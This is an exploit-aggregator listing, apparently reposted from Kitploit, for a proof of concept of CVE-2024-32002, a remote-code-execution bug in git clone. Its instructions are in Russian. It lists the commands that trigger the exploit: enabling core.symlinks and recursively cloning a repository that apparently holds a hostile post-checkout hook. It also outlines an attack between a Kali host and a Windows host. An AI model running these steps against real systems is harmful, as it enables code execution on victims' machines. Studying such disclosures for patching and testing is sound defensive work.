Sploitus

Exploit for git_rce

kitploit · 2026-09-05

Exploit Code

MARKDOWN36 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-EQSTLAB-GIT_RCE
# CVE-2024-32002 PoC

  1. Необходимо настроить параметр символических ссылок git следующим образом:



root@kitploit:~
    
    
    git config --global core.symlinks true
    

  2. Затем эксплуатируйте CVE-2024-32002 следующей командой:



root@kitploit:~
    
    
    git clone --recursive https://github.com/EQSTSeminar/git_rce.git
    

# Сценарий атаки

kali(192.168.216.129) --Передаёт адрес удалённого репозитория--> Win(192.168.216.130)

kali(192.168.216.129) <\--Выполнение git clone && hook-скрипта (post-checkout)-- Win(192.168.216.130)

# Дисклеймер

Этот репозиторий не предназначен для использования в качестве эксплойта RCE через git clone для CVE-2024-32002. Цель этого проекта — помочь людям узнать об этой уязвимости и, возможно, протестировать свои собственные приложения.

# Анализ

https://skshieldus.com/eng/business/insight.do#